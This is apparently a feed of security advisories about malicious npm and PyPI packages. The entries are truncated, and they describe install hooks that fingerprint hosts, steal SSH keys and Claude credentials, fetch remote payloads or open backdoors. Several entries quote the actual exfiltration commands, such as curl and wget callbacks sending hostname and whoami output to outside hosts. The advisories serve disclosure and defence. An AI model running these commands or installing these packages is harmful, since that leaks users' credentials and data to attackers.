Malicious code in @giftyhq/widget-components (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 8ad3f12a6a12fbfa60e4a72747df6974f89906200568926b99a8c93c489b5e62 package.json declares "preinstall": "node index.js", which fires automatically on npm install. index.js collects host fingerprinting data —...

Malicious code in oh-my-ashclaw (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector daf0a5a6234cbf55718057017cbe143ab41ad1aaf7964ebfaab6dfe12703b005 On npm install, the package's postinstall hook .prepare.cjs executes and harvests installer-side data: hostname, username, OS/arch, Node version, all...

Malicious code in chai-utils-test (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 64edd573a9e5fdef8dcde78f5b0c9fa00521f232b886be838104741d1e0535f7 Package name 'chai-utils-test' impersonates the popular 'chai' assertion library and ships a cloned chai source tree. The declared main index.js call...

Malicious code in @achuthvp/postinstall-poc (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector c3dc0d7b5fc216ae117dda9c492a6bbdff46e49ab53f069c2d525dab001bcdb9 package.json declares scripts.postinstall = node postinstall.js. On every npm install, postinstall.js runs execSync'id' and POSTs a JSON body...

Malicious code in 2fa-exe (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector df3ad6044ca4d17d594aa3aa0d1a75d1dbf3ebf483d0dd1b04d502277674a8cc Package advertises itself as an SVG fetcher/sanitizer but ships an undocumented exported factory getPlugin in index.js that performs an HTTPS GET to...

Malicious code in environment-gate (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 48e4ad756dbae70bb38049d363961eb27239c7cf18c6a92612579aeb818da7b1 The package's only export, gate, performs an HTTP GET to a base64-obfuscated URL https://www.jsonkeeper.com/b/VKUNI and passes the response body...

Malicious code in oa-crm-webapi (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 00cdaf89f7ae5fd12400ea55acd4849e8e5095dfc51188d3339ecdfa5dc0f2a1 [email protected] is a dependency-confusion payload squatting an internal-sounding package name. package.json declares a postinstall hook node...

Malicious code in axl-ui (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 6fbc071f0ee6323c87fa6be049a9b151217f7146605ef89b4494f7ef07e7d534 [email protected] is a dependency-confusion squat targeting an internal package name. package.json declares a postinstall hook node beacon.js that fires...

Malicious code in xy-shared (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector d631443367624273d8b7d3347b2e173a72f3f7447424f25424dab8e68c4b1a25 package.json wires both preinstall and postinstall to node callback.js, which auto-executes on npm install. callback.js collects username, uid/gid,...

Malicious code in loadninja-shared (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector dc01a627a5f67d1af201bfe6575973437cce899d9767312d44a40369dc16cc46 [email protected] is a dependency-confusion package targeting an internal/private package namespace. package.json declares "postinstall": "node...

Malicious code in easy-time666 (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 57bc31746af3bff6006bfe2da34cd0fb223a4bd9e867abddd172be5018821c22 package.json declares a postinstall hook that runs curl http://npm.wdf1.eyes.sh/pre?h=$hostname&u=&whoami over plain HTTP on every npm install, leaki...

Malicious code in sheratan_haha (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 6b473b40e0c041d34e85161ed8c91e0e00d006a0822698a0d3994876cb685ddd On npm install, the package's declared postinstall hook node postinstall.js runs whoami on the installer's machine and POSTs the output to a hardcode...

Malicious code in postcss-minify-selector-parser (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 957f5cbb74f4dd4b4770e8c9cc1a8aac88a4450cb01dbc0fa5242c42e343f54c The package name impersonates the widely-used postcss-selector-parser library which it also declares as a dependency and re-exports verbatim from...

Malicious code in postinstall-logger-7x9z (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 6e89b603ffc718873a9d4c42167bf0c667c995cc2547bc9b99373ad4e9f0ca1e On install, package.json's postinstall hook "postinstall": "node run.js" triggers execution of bundled beacon scripts beacon15.js and beaconlinux.js...

Malicious code in class-synth (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 1aa63407d7400b4819d0739dedad0a32d9ae29b18509693c2e8763cf30275271 class-synth is advertised as a small class/style/date utility library, but its main entry dist/index.js contains a hidden top-level async IIFE init...

Malicious code in node-multi-downloader (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 8fc720cd970f4d19212ca90945b7fc1e4e1c64da98235ff595b3792ae69e3e68 On npm install, this package's postinstall hook node index.js hex-encodes the installer's current working directory, the first 15 entries of that...

Malicious code in node-denv (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 1b0701ad772209918c78eb4d038cce43946517f3558cbec1988c121c115a641d node-denv presents itself as a pino-compatible logging middleware index.js exports module.exports.pino = middleware and mimics pino's option shape...

Malicious code in node-stack-frames (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 5fd4f6c5f3278484d99f6ffffc001cf920dcb0fa4fdfabff957a61c3cfbfc158 package.json declares a preinstall script that runs an inline Node program on npm install. The script requires os and http, collects os.hostname,...

Malicious code in node-app-doctor (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector addccbccd4c3c52cd67098a571ed77a4f55ea2303746f421b22b5bbf175a345e collect.js gathers host identifiers via os.hostname and os.homedir, reads local filesystem state with fs.existsSync, spawns childprocess commands, an...

Malicious code in houzidawang807 (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 7568d90e7a8d940b5618fa36bccfc2b7fa02ceaa814f0a416d2cc989c685e489 Package advertises itself as 'a simple date formatting utility' but ships an SSH-key-stealing C2 client. postinstall.js enumerates /.ssh for .pub...

Malicious code in houzidawang808 (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 71d6b96fe99e7f8503cb07df05d6b621dc8e8243fc7288844678d8aff043a654 The package presents itself as a 'simple date formatting utility' index.js exports a trivial formatDate wrapper around toLocaleDateString, but ships ...

Malicious code in houzidawang806 (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 2dbf603db6d0a3434c6c417dd460f26d08b9e230c03926f05987bb3841d3c72b Package self-describes as 'A simple date formatting utility' but ships two distinct attacker primitives. 1 postinstall.js enumerates /.ssh/ for .pub...

Malicious code in ecto_module (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 7e66c690abd94ee498cd359eb076451c0f6ea3956d8221616bbf8990d35a38c5 On npm install, the package's preinstall hook node index.js reads /flag.txt falling back to execSync'cat /flag' and transmits the captured contents i...

Malicious code in vite-config-react (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector d1f9ee389e1023034a78a4c268db5d48e016565f37b7fb6c514bf095b2dec552 On require/import of the package, the entrypoint chain src/index.js → core/createConfig.js → features/plugins.js side-effect-imports...

Malicious code in vite-config-optimizer (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector f824c077d7d2705d17dc29eba9a24ea8b51b93785bcf83fdfe639fc8f9bc581f package.json declares a postinstall hook node -e "require'./loader.js'" that auto-executes on every npm install. loader.js spawns a detached child No...

Malicious code in @ci-lifecycle-test/postinstall-ping (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 75c160ad40a237c1e682c696ebd0aec2861ca072f47bd5b725bc80f7f95ed509 The package's postinstall lifecycle script postinstall.js executes automatically on npm install and POSTs the JSON-serialized contents of the entire...

Malicious code in warp-dependency (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 493b3ed30d94fb482e4b9c7cf3d328ba9b307f91965783f0024ec7dca1fedb96 [email protected] declares postinstall: node index.js in package.json. The index.js entry point is heavily obfuscated using obfuscator.io-style...

Malicious code in dash-grid-normalizer (PyPI)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 362011eafffa765e7f6c24df4ec2c7bb8f9fb6b6414570a5d193e6ea90e1250a On import, src/dashgridnormalizer/init.py calls hydrateremotelayoutprofile, which reassembles a payload from four string segments, base64-decodes and...

Malicious code in ect-472839-ctf (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector a67248cb7373817da18e0edf4a019e2e6c9ded239e93a2e477ac168f7f45eeaa package.json declares a preinstall hook "preinstall": "node index.js" that auto-executes on npm install. index.js issues an HTTP GET to the hardcoded...

Malicious code in ect-654321 (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector ec784a9a1926de8d2c18de41c996e69e10f7001bf9fdc7604edc22d5775b4540 ect-654321 contains only a package.json with a preinstall lifecycle hook that unconditionally executes wget...

Malicious code in ect-839201 (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 0ac6cc7433a67e0087dfa415071c9338be630c2166cd38ac371afadbdd0161e3 package.json declares a preinstall lifecycle hook that runs node -e "require'http'.get'http://10.107.121.85:8001/callback839201'" on npm install. Thi...

Malicious code in ect-839201-ctf (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector bda37f74ff0d1b56cb7805906d4fd32a7e2ccc15aa96768d9f9e510202712dcb On npm install, package.json's preinstall script executes wget http://10.107.121.85:8000/callbackwget || curl http://10.107.121.85:8000/callbackcurl ...

Malicious code in textwrap-toolkit-stager (PyPI)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 9fc85924d5672f7c91c2dd5e97c46cc48e3ae48084f906b7b0ba9d606c433fa4 On import textwraptoolkitstager, the package's init.py unconditionally fetches Python source from...

Malicious code in claudechor (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 4a9cbb36cf7ed82685830b5d3a2b341bff9ef86e2688842d1f54259b2b6fb533 The package's bin entry reads installer-owned Claude credential files /.claude/.credentials.json and /.claude.json — written by Anthropic's official...

Malicious code in beamz (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector c380f1f0fc3c5cf723cd7d92bf41c30f622aafaa633a32f0a78bf91a3a769d2a The package advertises itself as a credential-transfer CLI but implements transfer by reading the user's Anthropic Claude Code credentials...

Malicious code in chalk-plus-js (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector f5351482f03a50cab8a28b6aa7c992c960a55c6889634d2a04bb86a157ac18d1 Package is published under a name riding the popular chalk color-output library but its source tree, README, main entry lib/nodemailer.js, and lib...

Malicious code in chalk-pro (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector ac66dfb6013c32d34c6ce83bdba4628b67539e81df27fe18dcf71d3de05ff8ce Package is published as 'chalk-pro' homepage chalk-pro.com but its main entry is a verbatim copy of nodemailer's API — a typosquat impersonating both...

Malicious code in jextic-eclib (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 13a6476409b9cb9296b7f778be375081c8ad12b030658351092e9fef90f4b707 On npm install, the package's postinstall hook postinstall.js requires index.js, whose top-level scanAndExfiltrate call walks the installer's working...

Malicious code in chalk-plus-ts (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 08276c56353501373a202d28f6af6ee2a7c0b20d28a07d99c4c16309df46269c package.json declares postinstall=node lib/utils/index.js, which spawns a detached child process running lib/utils/smtp-connection/index.js. That...

Malicious code in vite-plugin-logo (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector b107e832dfd60ded8637d9a6db69c980eae13bde79da4cd01d69c5a1110aca2b On require, index.js walks up to 5 parent directories searching for public/assets/logo.png, scans the file bytes for the marker VITEASSETCACHEv1,...

Malicious code in workflow-postgres-setup (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 19848a1b4a7188ada5866c459ec2b966b9aa6ba1d23e3c25b1f54939e6a6b963 The package advertises itself as a Postgres/workflow setup helper but ships no library code — the declared main entry index.js is absent from the...

Malicious code in vite-plugin-compress-js (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector ba5cca8be2f19842c304f355a2219256b3af26e9df385ec314ea6899621110aa On module load, the package's initPlugin function performs an HTTP GET to https://www.jsonkeeper.com/b/OTOAQ an anonymous public JSON-paste host and...

Malicious code in vite-svgr (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector a22a309bc488d107fc2734705e05bb4032432bb9b54391e8ee2325d980b2cdf5 Package name vite-svgr impersonates the popular vite-plugin-svgr, but the shipped code is a fork of tsconfig-paths package.json description: 'Load no...

Malicious code in friendly-greeter-demo (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 9b881e279b0b93ea759ec1f1a2265382a01778725a1c563a5ea4eb168e03ca5d friendly-greeter-demo ships an active remote-access backdoor that fires both at install time postinstall.js, run automatically by npm install and on...

Malicious code in theta-connector (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector f9ac14206b12d7cb0c180c49e65d91b99aa2f013c33147d7f1eff396da2c48a2 The package advertises itself as a MySQL connector but index.js around line 236 contains a method queryDBConnect on the exported...

Malicious code in theta-kit (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 09b0737ff5b0b0768e2314b014529b80609632a38dfdc3a9ad6cfd6ab1da9039 package.json declares postinstall: node dist/index.js, and dist/index.js executes Model.resetor at module top level — meaning both npm install...

Malicious code in ttspc-server-sample (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 98ea79d9fce12a87d3949dc748617f8077a1ae0822fadab451c27d2c8a2feb9b [email protected] declares postinstall: node index.js in package.json, so on npm install it automatically executes index.js. The script...

Malicious code in eslint-plugin-mistica-local-rules (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector c1d21f50741178986b63d1f330373131c2f3f502a5b94e76ca921ce185fab123 package.json declares a preinstall hook that runs index.js automatically on npm install. index.js collects host identity os.hostname, os.platform,...

Malicious code in flexitest (PyPI)

--- -= Per source details. Do not edit below this line.=- Source: kam193 17f4bae10d193f8128f50dd3010d283dc89016fa468fc8d9b428b5183c505b27 Installing the package or importing the module exfiltrates basic information about the host, and the package has no other purpose. --- Category: PROBABLYPENTES...

Malicious code in transportator (npm)

--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware 6f40d878023c5462d17916a03d22d7c2e9e1573ab590f50532aa2e620e7a5a13 Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...